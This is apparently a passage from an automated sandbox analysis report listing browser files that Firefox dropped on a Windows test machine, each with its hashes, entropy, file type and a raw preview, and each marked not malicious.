                                                                                                                                                                                  SHA1:706E218DB75103303A68C3E352B1F3F1B42E6560
                                                                                                                                                                                  SHA-256:78BCAB615E67057F06EAD77D84CB6A99EEEBC43B02F984B32B97644C9F584ACE
                                                                                                                                                                                  SHA-512:A8B10A66CA872DE9EEE590F401653AD28EED672B904E5E54EF7585A380568F4BBCC5BFB75944179C895C4DEFE8428573AFEAF422A2400E8D920EEA3163F1B175
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..K....{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/","title#....cacheKey":0,"ID":4,"docshellUU...D"{11e7cea9-5bca-4ef4-99d5-d15ccdbf2a12}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":5,"persist":true}],"lastAccessed":1708519407306,"hiddey..searchMode...userContextId...attributq..{},"index":1...questedI..s0,"imagL./},....accounts.googl....'......5.......8508044b-8b74-4031-8f66-d4fa2a869b35S...referrerInfo":"BBoSnxDOS9qmDeAnom1e0A...w..$EY.....0BAQ..oABAA==..^.6..._31123..x....facebook.._video....)......20....a5f52f7a-55de-42a5-a0f3-bf86fd118a2....../21...?719..V.."chrome://global/skin/icons/warning.svg":...2....0.&......265a797d-c1b5-444b-997e-dbc67fa45e893../22&..?207<.W.&.3.9..pv3/signt..D..?continue=D..%3A%2F%2F@...%2F&followup....ifkv=ATuJsjw9e7PC33_7-svQuQgHqA5CnbF8YAeK-gwghWImJ8owO10ADdpehR33T0NeoeEcxd4BmlVz&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\recovery.jsonlz4.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 19410 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6252
                                                                                                                                                                                  Entropy (8bit):6.65946569878185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:FhyMjZWL7hYx7rnluViF0IlMZkcML4rsaSt6zi:Bjsp07seE3sa8L
                                                                                                                                                                                  MD5:63CA9F30BA62777BE4FF5B309BBD91FC
                                                                                                                                                                                  SHA1:706E218DB75103303A68C3E352B1F3F1B42E6560
                                                                                                                                                                                  SHA-256:78BCAB615E67057F06EAD77D84CB6A99EEEBC43B02F984B32B97644C9F584ACE
                                                                                                                                                                                  SHA-512:A8B10A66CA872DE9EEE590F401653AD28EED672B904E5E54EF7585A380568F4BBCC5BFB75944179C895C4DEFE8428573AFEAF422A2400E8D920EEA3163F1B175
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..K....{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/","title#....cacheKey":0,"ID":4,"docshellUU...D"{11e7cea9-5bca-4ef4-99d5-d15ccdbf2a12}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":5,"persist":true}],"lastAccessed":1708519407306,"hiddey..searchMode...userContextId...attributq..{},"index":1...questedI..s0,"imagL./},....accounts.googl....'......5.......8508044b-8b74-4031-8f66-d4fa2a869b35S...referrerInfo":"BBoSnxDOS9qmDeAnom1e0A...w..$EY.....0BAQ..oABAA==..^.6..._31123..x....facebook.._video....)......20....a5f52f7a-55de-42a5-a0f3-bf86fd118a2....../21...?719..V.."chrome://global/skin/icons/warning.svg":...2....0.&......265a797d-c1b5-444b-997e-dbc67fa45e893../22&..?207<.W.&.3.9..pv3/signt..D..?continue=D..%3A%2F%2F@...%2F&followup....ifkv=ATuJsjw9e7PC33_7-svQuQgHqA5CnbF8YAeK-gwghWImJ8owO10ADdpehR33T0NeoeEcxd4BmlVz&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\data.safe.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) chistory, text, rows 0, columns 2817
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                  Entropy (8bit):4.253463615841034
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:klJFc/slbKRxrtsLQ9Cl/lRlQRM9WREaD342WeuWsgfeYY:szcxhF8dQsWiA3ztuyHY
                                                                                                                                                                                  MD5:25B33BCBDE336FD8FBE9691DBDCD8518
                                                                                                                                                                                  SHA1:8C00082575CFB1930A9FA057D610E02420A2BD82
                                                                                                                                                                                  SHA-256:5C7749CAA02F42E02108680C7A76024706BE72EF23CD6DDC044CDD4BBDDA1C1E
                                                                                                                                                                                  SHA-512:72F750E8676FD0748E1B45306644F043951CEC14A5AB5A200650D525DB2B83DF37400D614D332A9F984926B7725CE8F0AF2265499D4694C31A01DA00DFBBE2F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................synchistory....................v1-settings-sync.1708509430155B........9.......{"timestamp":1708509430155,"status":"success","infos":{}}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2072
                                                                                                                                                                                  Entropy (8bit):0.4055217869301514
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l8L0X9dlp/FlalTX/lal/QMRgSEBtl/StlVltllJWXXr3v:7+/l5X//mTI/vgvBtlq2Hr3v
                                                                                                                                                                                  MD5:A34D73A2E8017F1C4E385A1021A57B48
                                                                                                                                                                                  SHA1:157D1314D2AD257A5A1CEABC1B626E2DDC10E11D
                                                                                                                                                                                  SHA-256:431B08347768511C512962C73100495A2AC98B6D299B82DB24B53A497AED7F5F
                                                                                                                                                                                  SHA-512:4E1758622176B76097CEA027F7E09D8F54CED1F85C9E1B3FB2E59372A8BD275815259296ED00829F2242ECE92174A1245C3F6752BB67C3A04A7CA9517590A319
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c......>..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\.metadata-v2-tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):53
                                                                                                                                                                                  Entropy (8bit):3.546462518443435
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:8oVezYrSLUxGTl:8e9GLUxGp
                                                                                                                                                                                  MD5:DB04B9E39EC847B52BF41A17057B905C
                                                                                                                                                                                  SHA1:C65199559B3194755FA80882D8E19C614484188E
                                                                                                                                                                                  SHA-256:8866D81074C9BBD8523CFEA3064C85C4BD4808B545A04D43DBE0CEDA0CC64423
                                                                                                                                                                                  SHA-512:B238FD3F0FDB12027E5BC945999FA1FA7A99DEB1057AEE4DCBCB7464D680DC03A2ACCA3FC162A2CB5F6CF2AADBD55354A7EE94CD03C6E46EB839C90709054DBD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.....r .....................https://www.youtube.com.

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\cache\.padding

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:7DEA362B3FAC8E00956A4952A3D4F474
                                                                                                                                                                                  SHA1:05FE405753166F125559E7C9AC558654F107C7E9
                                                                                                                                                                                  SHA-256:AF5570F5A1810B7AF78CAF4BC70A660F0DF51E42BAF91D4DE5B2328DE0E83DFC
                                                                                                                                                                                  SHA-512:1B7409CCF0D5A34D3A77EAABFA9FE27427655BE9297127EE9522AA1BF4046D4F945983678169CB1A7348EDCAC47EF0D9E2C924130E5BCC5F0D94937852C42F1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                  Entropy (8bit):0.13951005433287042
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l+uGsll/FllkpMRgSWbNFl/sl+ltlsl8lcWllTcg:7+/lRjg9bNFlEs1E0cI
                                                                                                                                                                                  MD5:462F5B874DB1ADB29AE6D1A4F2F2337B
                                                                                                                                                                                  SHA1:6E4EC70FBE3537543FF5FA1268123492986844EB
                                                                                                                                                                                  SHA-256:ABECA75B1F17BD31B48AF60348878CB60A4DB08328489E3492B9C9B34D32A614
                                                                                                                                                                                  SHA-512:9031975226249667432957C9953735788F23F695DEA296695D935BC717BD0886C193DB8CE9C2D03611BC08743058CAB6E3A8A5DCE512547DC3C5B6D73DA4B7B4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c........E....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j.................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\2171031483YattIedMb.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 416, last written using SQLite version 3042000, writer version 2, read version 2, file counter 3, database pages 11, cookie 0xd, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                  Entropy (8bit):0.7514262610120032
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:T/OA65g7LV6CM5znpgBlizb5pxVgnO9zxV+LU7mY2wzY5QcEVdyET:j16S6CKnqlizbxV+2xVeU7X2B0T
                                                                                                                                                                                  MD5:4C6111BEAC59B77E17F7378B0EA0D8E5
                                                                                                                                                                                  SHA1:45210A2064C1387D4A39FE3356A4ED34C8EC4A83
                                                                                                                                                                                  SHA-256:C3D5BF2FA267C07D4301D82404A5C0E21EC9E79398FE3F15F30999A082B4C0EF
                                                                                                                                                                                  SHA-512:A8F91BA7D9728829A49210F1B7E38735645DB7F909703208EDD8BB44F5BF91DD7655CE1F57C2ED94D3A1DAA2D97888CC72B090978A87EE87CC66A17EDC4321D5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............;.......[..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-...3....triggerfile_update_triggerfileCREATE TRIGGER file_update_trigger AFTER UPDATE ON file FOR EACH ROW WHEN NEW.refcount = 0 BEGIN DELETE FROM file WHERE id = OLD.id; END.Y...A#..Ytriggerobject_data_delete

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\2171031483YattIedMb.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                  Entropy (8bit):0.13949598770239585
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l+5ll9llntFllkpMRgSWbNFl/sl+ltlsl8lcWll5n:7+/lklvlBg9bNFlEs1E0ccn
                                                                                                                                                                                  MD5:F13DD9EEE9BE739F39C1F4354641D047
                                                                                                                                                                                  SHA1:25B7F8B339811AC24BE33855A0DBC45C19E1E2B1
                                                                                                                                                                                  SHA-256:4E07B9018EBAE8E10EA69A05DCA6ABA29912B67949882E2FC5B24B999F51FCB9
                                                                                                                                                                                  SHA-512:498F6512164D1D4FED199A71411765FABD3785CE1FFCDB90633664F184B852A124BC9833E4041CDA1468BF57B82FE618B8BF90BE582581FE38E4F3269BDDA894
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j.................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\2171031483YattIedMb.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.036642278953288344
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:GHlV/UlC7Pt7zvqMmGolPlV/UlC7Pt7zvqMmftL89//2lPl:Gv0CcMmn30CcMmftL89XCd
                                                                                                                                                                                  MD5:BD529E07D466DAEF4D6FD7864518CFCE
                                                                                                                                                                                  SHA1:9D36F20C060A91C0CBBB217C6C791CBE17816104
                                                                                                                                                                                  SHA-256:842D2C071EBBE19F11ABBED2C9B379D689CB555D4A76988E19E5AC3BD7DE6E81
                                                                                                                                                                                  SHA-512:584CB776FC0B0226FF4A285B669875CCC105163A913CAEE59EC25249B7FF8748015F6A9013FCF83839250A5600E034E4D8970C32E7575DA70C6EC8962E2CACCC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-......................T.*........> ..{qpG^n....-......................T.*........> ..{qpG^n..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\3808659071LCo7g%sCD7a%taa3b8a2s.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 416, last written using SQLite version 3042000, writer version 2, read version 2, file counter 3, database pages 11, cookie 0xd, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                  Entropy (8bit):0.7559849410601909
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:T/OA65g7LV6CM5znpgBlizb5pxVgnO9zxV+LU7mY2wzY5QcEVdyEt:j16S6CKnqlizbxV+2xVeU7X2B0t
                                                                                                                                                                                  MD5:00190628F1ACC7CD13FB19C8FC244FAF
                                                                                                                                                                                  SHA1:E63B584C7912B0142ECCB4900C65281186AD912B
                                                                                                                                                                                  SHA-256:D88BF38E09C9B6657E55FB4657BCAB47EA1F2FABF8941ABBFDB294E9B9968E96
                                                                                                                                                                                  SHA-512:245FDA85BA8A673748A67D143C3AFC160E677A4E37CD9EA867403F523B74FA2EC97E79C8F3B9E42E26A2FFC812A641FA1601BDB00B6F51D6A69320E68D09B8DF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j............;.......[..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-...3....triggerfile_update_triggerfileCREATE TRIGGER file_update_trigger AFTER UPDATE ON file FOR EACH ROW WHEN NEW.refcount = 0 BEGIN DELETE FROM file WHERE id = OLD.id; END.Y...A#..Ytriggerobject_data_delete

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\3808659071LCo7g%sCD7a%taa3b8a2s.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                  Entropy (8bit):0.1403625388289123
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l+3AllFntFllkpMRgSWbNFl/sl+ltlsl8lcWllDs:7+/lLlhg9bNFlEs1E0ch
                                                                                                                                                                                  MD5:79EB7E15D4B9CF1DCC22874602B749AB
                                                                                                                                                                                  SHA1:5A5216B275687D3994CAA71666C9E30FAFD176F2
                                                                                                                                                                                  SHA-256:7D06F622BE5D58CCFD8EA31F777B149EAA292F164A7EEE0A7B87BA8639ABBA1C
                                                                                                                                                                                  SHA-512:952ADA98CF16EBE8B77DDE7355D20F60FB6D460F3B093C41E52212619D8D61F5822118DBF8CB504CBE3B74681D2ABBBEB55891CE6EF5262C47FA96E1FF04C499
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c......SqI....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j.................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\default\https+++www.youtube.com\idb\3808659071LCo7g%sCD7a%taa3b8a2s.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.036642278953288344
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:GHlV/Ul4eMqXpXHjcS1bo/dlV/Ul4eMqXpXHjcS1CZ89//2lPl:Gv04mZwS+N04mZwSoZ89XCd
                                                                                                                                                                                  MD5:80FD28D1F460BA4D8252BEDAC801A348
                                                                                                                                                                                  SHA1:26E1B911FFA8B984E94139EBE2C5C03B57BD36C8
                                                                                                                                                                                  SHA-256:CA7AFDAD062CB047CB8532CEFFABBFF3103D6416DEFE3C298522E7354E7FA04D
                                                                                                                                                                                  SHA-512:CE1CAA501EDE66AE5A922264B1A79E34B0850ADDC0311CD044DBB2817AC098CFC9A473BD5F8F4C513A4295EDF7231013E1D7DC7A9B9E3F75A908479A5005D258
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.......................,.;iOR.~..Wr".y@.(.P@...-.......................,.;iOR.~..Wr".y@.(.P@.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.02036431332101122
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lo5jYl8lo5jlxR9//:G0o5jI0o5jlr9X
                                                                                                                                                                                  MD5:2B2CBCE2D4A44A5BA96BED79D5C20B7C
                                                                                                                                                                                  SHA1:D29D481F22A2683CEC39CE0A20B3F17B3FB286B6
                                                                                                                                                                                  SHA-256:09C11EEC277B4A17AED9488E8B92BE808C5CC729CBB7C7819AA71F7DAFC88F75
                                                                                                                                                                                  SHA-512:A82C586213827309CE69BE9FEFE5C530246B59667C5FA8D1DB64AE72E5A935865BE327A69B5D88489A319DC8F87EBCEAE8A03164D8B5916AC41D32691AFB40B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.................................r..&8......0..-.................................r..&8......0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):828655
                                                                                                                                                                                  Entropy (8bit):7.998819316098926
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:24576:RU5+yypiAf3Q5sQ2rveB3Rd0fXj9i+BZqYqrW:g+yycAY5mrva3RdCjgY
                                                                                                                                                                                  MD5:0C40063DE91B8B8297F5398D04D72B22
                                                                                                                                                                                  SHA1:8355767BB03A3D894F5FD142F767518603ADB3C7
                                                                                                                                                                                  SHA-256:3CD2EE400A959DC53FD60776CBBE220AA752903B658B262788D2BE974F341FC8
                                                                                                                                                                                  SHA-512:34EEF7708B456E637706E6E79A5911EFBF1B747FE524DCEACE14F586EE09907CA2B893AFDD0855495014789ECB7805B252B22201BE91205E33227EA24AADC2CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......M.....f..W~)....,........Vs...U...!Vb...6....f...B.B...$h.v.x=..?..D.......;...........o y...*.w.(W#... _../.....u.`...Yq..u.."l.....E........h.M...'..xK.,<.O.....O.h...sy..(BX.[..M...q.......vc.4.L{..9>9..;.......$!..(....0h........s..?Y../Q.'E.,...V....pR...Fr...qs.....Q..T.kz-.........><..:..6r.....$.....(.....--...P.vK..&.d...xuJ6......2j..&oz..+PF<../...o...2=X......2....c.G..V<7.nt....O.!.{m;.}....LP...N|...U...3.).+.SW6G..l..B..u\...m-).9.r..j..nd_....h.*....kD.#.O.0.....;Z........{..4.g..;-+.w.=^..(.m.a/.w$...-....af&..........E~9...8/.....}...3K.2.[b....P.3.k.............N.rR.)..a.3...3./E..t..o..3>.....m.N...o...{..;.........B..~...W....S3..n(..|..Z...Nb.r";.iw.V.6=V..O.>g..k..^.....C=>5+.G..".37..Q.....l~.!...[8.X..+......}r.V._.o...PG.....V.2..._..\.8....e..m......o..&W&..THW.*P4+..........s)....4.....g.A.i........N..?3..{g.i..#.U.}.gL..........n..Gu.a.6.$X....b.n.{.4..9.....;=n..x.d.S:o.+.0.3.?&....V.....J..~.y....

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 416, last written using SQLite version 3042000, writer version 2, read version 2, file counter 21, database pages 505, 1st free page 502, free pages 2, cookie 0xd, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 21
                                                                                                                                                                                  Category:dropped
